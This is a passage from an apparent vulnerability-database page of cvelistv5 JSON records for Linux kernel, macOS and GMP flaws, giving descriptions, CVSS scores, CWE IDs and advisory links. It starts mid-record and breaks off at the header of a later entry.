] }, "source": { "defect": [ "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075" ], "discovery": "INTERNAL" } } } }, "cveMetadata": { "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "assignerShortName": "Anolis", "cveId": "CVE-2022-40133", "datePublished": "2022-09-09T14:39:51.501308Z", "dateReserved": "2022-09-07T00:00:00", "dateUpdated": "2024-09-17T03:49:24.624Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3545
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
Linux Kernel IPsec nfp_cppcore.c area_cache_get use after free
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:01.597Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211045" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20221223-0003/" }, { "name": "DSA-5324", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a" }, { "url": "https://vuldb.com/?id.211045" }, { "url": "https://security.netapp.com/advisory/ntap-20221223-0003/" }, { "name": "DSA-5324", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "Linux Kernel IPsec nfp_cppcore.c area_cache_get use after free", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3545", "datePublished": "2022-10-17T00:00:00", "dateReserved": "2022-10-17T00:00:00", "dateUpdated": "2024-08-03T01:14:01.597Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1206
Vulnerability from cvelistv5
Published
2023-06-30 00:00
Modified
2024-10-15 17:11
Severity ?
EPSS score ?
Summary
A hash collision flaw was found in the IPv6 connection lookup table in the Linux kernel’s IPv6 functionality when a user makes a new kind of SYN flood attack. A user located in the local network or with a high bandwidth connection can increase the CPU usage of the server that accepts IPV6 connections up to 95%.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:40:59.789Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2175903" }, { "name": "DSA-5480", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "name": "DSA-5492", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5492" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230929-0006/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-1206", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-10-15T17:09:04.074571Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-10-15T17:11:50.947Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "kernel 6.5-rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "A hash collision flaw was found in the IPv6 connection lookup table in the Linux kernel\u2019s IPv6 functionality when a user makes a new kind of SYN flood attack. A user located in the local network or with a high bandwidth connection can increase the CPU usage of the server that accepts IPV6 connections up to 95%." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-400", "description": "CWE-400", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T19:06:53.711288", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2175903" }, { "name": "DSA-5480", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "name": "DSA-5492", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5492" }, { "url": "https://security.netapp.com/advisory/ntap-20230929-0006/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1206", "datePublished": "2023-06-30T00:00:00", "dateReserved": "2023-03-06T00:00:00", "dateUpdated": "2024-10-15T17:11:50.947Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-8696
Vulnerability from cvelistv5
Published
2020-10-27 19:39
Modified
2024-08-04 21:24
Severity ?
EPSS score ?
Summary
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. An attacker in a privileged network position may be able to execute arbitrary code.
References
▼ | URL | Tags |
---|---|---|
https://support.apple.com/en-us/HT210348 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T21:24:29.532Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/en-us/HT210348" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "macOS", "vendor": "Apple", "versions": [ { "lessThan": "10.14", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. An attacker in a privileged network position may be able to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "description": "An attacker in a privileged network position may be able to execute arbitrary code", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-10-27T19:39:23", "orgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "shortName": "apple" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/en-us/HT210348" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "product-security@apple.com", "ID": "CVE-2019-8696", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "macOS", "version": { "version_data": [ { "version_affected": "\u003c", "version_value": "10.14" } ] } } ] }, "vendor_name": "Apple" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. An attacker in a privileged network position may be able to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "An attacker in a privileged network position may be able to execute arbitrary code" } ] } ] }, "references": { "reference_data": [ { "name": "https://support.apple.com/en-us/HT210348", "refsource": "MISC", "url": "https://support.apple.com/en-us/HT210348" } ] } } } }, "cveMetadata": { "assignerOrgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "assignerShortName": "apple", "cveId": "CVE-2019-8696", "datePublished": "2020-10-27T19:39:23", "dateReserved": "2019-02-18T00:00:00", "dateUpdated": "2024-08-04T21:24:29.532Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-46813
Vulnerability from cvelistv5
Published
2023-10-27 00:00
Modified
2024-08-02 20:53
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel before 6.5.9, exploitable by local users with userspace access to MMIO registers. Incorrect access checking in the #VC handler and instruction emulation of the SEV-ES emulation of MMIO accesses could lead to arbitrary write access to kernel memory (and thus privilege escalation). This depends on a race condition through which userspace can replace an instruction before the #VC handler reads it.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:53:21.700Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1212649" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=63e44bc52047f182601e7817da969a105aa1f721" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b9cb9c45583b911e0db71d09caa6b56469eb2bdf" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a37cd2a59d0cb270b1bba568fd3a3b8668b9d3ba" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.5.9" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3711-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel before 6.5.9, exploitable by local users with userspace access to MMIO registers. Incorrect access checking in the #VC handler and instruction emulation of the SEV-ES emulation of MMIO accesses could lead to arbitrary write access to kernel memory (and thus privilege escalation). This depends on a race condition through which userspace can replace an instruction before the #VC handler reads it." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T21:06:34.720403", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1212649" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=63e44bc52047f182601e7817da969a105aa1f721" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b9cb9c45583b911e0db71d09caa6b56469eb2bdf" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a37cd2a59d0cb270b1bba568fd3a3b8668b9d3ba" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.5.9" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3711-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-46813", "datePublished": "2023-10-27T00:00:00", "dateReserved": "2023-10-27T00:00:00", "dateUpdated": "2024-08-02T20:53:21.700Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3609
Vulnerability from cvelistv5
Published
2023-07-21 20:47
Modified
2024-08-02 07:01
Severity ?
EPSS score ?
Summary
Use-after-free in Linux kernel's net/sched: cls_u32 component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:01:56.672Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=04c55383fa5689357bcdd2c8036725a55ed632bc" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/04c55383fa5689357bcdd2c8036725a55ed632bc" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230818-0005/" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.4", "status": "affected", "version": "4.14", "versionType": "custom" } ] } ], "datePublic": "2023-06-09T10:40:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cp\u003eA use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_u32 component can be exploited to achieve local privilege escalation.\u003c/p\u003e\u003cp\u003eIf tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.\u003c/p\u003e\u003cp\u003eWe recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc.\u003c/p\u003e" } ], "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_u32 component can be exploited to achieve local privilege escalation.\n\nIf tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.\n\nWe recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-07-21T20:47:12.172Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=04c55383fa5689357bcdd2c8036725a55ed632bc" }, { "url": "https://kernel.dance/04c55383fa5689357bcdd2c8036725a55ed632bc" }, { "url": "https://security.netapp.com/advisory/ntap-20230818-0005/" }, { "url": "https://www.debian.org/security/2023/dsa-5480" }, { "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s net/sched: cls_u32 component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-3609", "datePublished": "2023-07-21T20:47:12.172Z", "dateReserved": "2023-07-10T20:52:53.660Z", "dateUpdated": "2024-08-02T07:01:56.672Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-28388
Vulnerability from cvelistv5
Published
2022-04-03 20:07
Modified
2024-08-03 05:56
Severity ?
EPSS score ?
Summary
usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c in the Linux kernel through 5.17.1 has a double free.
References
▼ | URL | Tags |
---|---|---|
https://github.com/torvalds/linux/commit/3d3925ff6433f98992685a9679613a2cc97f3ce2 | x_refsource_MISC | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LAWC35TO642FOP3UCA3C6IF7NAUFOVZ6/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XFMPUI3WI4U2F7ONHRW36WDY4ZE7LGGT/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6IHHC455LMSJNG4CSZ5CEAHYWY2DE5YW/ | vendor-advisory, x_refsource_FEDORA | |
https://www.debian.org/security/2022/dsa-5127 | vendor-advisory, x_refsource_DEBIAN | |
https://security.netapp.com/advisory/ntap-20220513-0001/ | x_refsource_CONFIRM | |
https://www.debian.org/security/2022/dsa-5173 | vendor-advisory, x_refsource_DEBIAN |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T05:56:14.998Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/3d3925ff6433f98992685a9679613a2cc97f3ce2" }, { "name": "FEDORA-2022-af492757d9", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LAWC35TO642FOP3UCA3C6IF7NAUFOVZ6/" }, { "name": "FEDORA-2022-5cd9d787dc", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XFMPUI3WI4U2F7ONHRW36WDY4ZE7LGGT/" }, { "name": "FEDORA-2022-91633399ff", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6IHHC455LMSJNG4CSZ5CEAHYWY2DE5YW/" }, { "name": "DSA-5127", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5127" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220513-0001/" }, { "name": "DSA-5173", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5173" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c in the Linux kernel through 5.17.1 has a double free." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-07-04T10:10:18", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/torvalds/linux/commit/3d3925ff6433f98992685a9679613a2cc97f3ce2" }, { "name": "FEDORA-2022-af492757d9", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LAWC35TO642FOP3UCA3C6IF7NAUFOVZ6/" }, { "name": "FEDORA-2022-5cd9d787dc", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XFMPUI3WI4U2F7ONHRW36WDY4ZE7LGGT/" }, { "name": "FEDORA-2022-91633399ff", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6IHHC455LMSJNG4CSZ5CEAHYWY2DE5YW/" }, { "name": "DSA-5127", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5127" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20220513-0001/" }, { "name": "DSA-5173", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5173" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2022-28388", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c in the Linux kernel through 5.17.1 has a double free." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/torvalds/linux/commit/3d3925ff6433f98992685a9679613a2cc97f3ce2", "refsource": "MISC", "url": "https://github.com/torvalds/linux/commit/3d3925ff6433f98992685a9679613a2cc97f3ce2" }, { "name": "FEDORA-2022-af492757d9", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LAWC35TO642FOP3UCA3C6IF7NAUFOVZ6/" }, { "name": "FEDORA-2022-5cd9d787dc", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XFMPUI3WI4U2F7ONHRW36WDY4ZE7LGGT/" }, { "name": "FEDORA-2022-91633399ff", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6IHHC455LMSJNG4CSZ5CEAHYWY2DE5YW/" }, { "name": "DSA-5127", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5127" }, { "name": "https://security.netapp.com/advisory/ntap-20220513-0001/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20220513-0001/" }, { "name": "DSA-5173", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5173" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-28388", "datePublished": "2022-04-03T20:07:39", "dateReserved": "2022-04-03T00:00:00", "dateUpdated": "2024-08-03T05:56:14.998Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-43618
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 04:03
Severity ?
EPSS score ?
Summary
GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T04:03:08.577Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html" }, { "tags": [ "x_transferred" ], "url": "https://bugs.debian.org/994405" }, { "tags": [ "x_transferred" ], "url": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e" }, { "name": "[debian-lts-announce] 20211202 [SECURITY] [DLA 2837-1] gmp security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html" }, { "name": "[oss-security] 20221013 Re: sagemath denial of service with abort() in gmp: overflow in mpz type", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/10/13/3" }, { "name": "20221016 Re: over 2000 packages depend on abort()ing libgmp", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2022/Oct/8" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20221111-0001/" }, { "name": "GLSA-202309-13", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202309-13" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-09-29T14:06:22.071388", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html" }, { "url": "https://bugs.debian.org/994405" }, { "url": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e" }, { "name": "[debian-lts-announce] 20211202 [SECURITY] [DLA 2837-1] gmp security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html" }, { "name": "[oss-security] 20221013 Re: sagemath denial of service with abort() in gmp: overflow in mpz type", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/10/13/3" }, { "name": "20221016 Re: over 2000 packages depend on abort()ing libgmp", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2022/Oct/8" }, { "url": "https://security.netapp.com/advisory/ntap-20221111-0001/" }, { "name": "GLSA-202309-13", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202309-13" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-43618", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-11-15T00:00:00", "dateUpdated": "2024-08-04T04:03:08.577Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-40982
Vulnerability from cvelistv5
Published
2023-08-11 02:37
Modified
2024-08-03 12:28
Severity ?
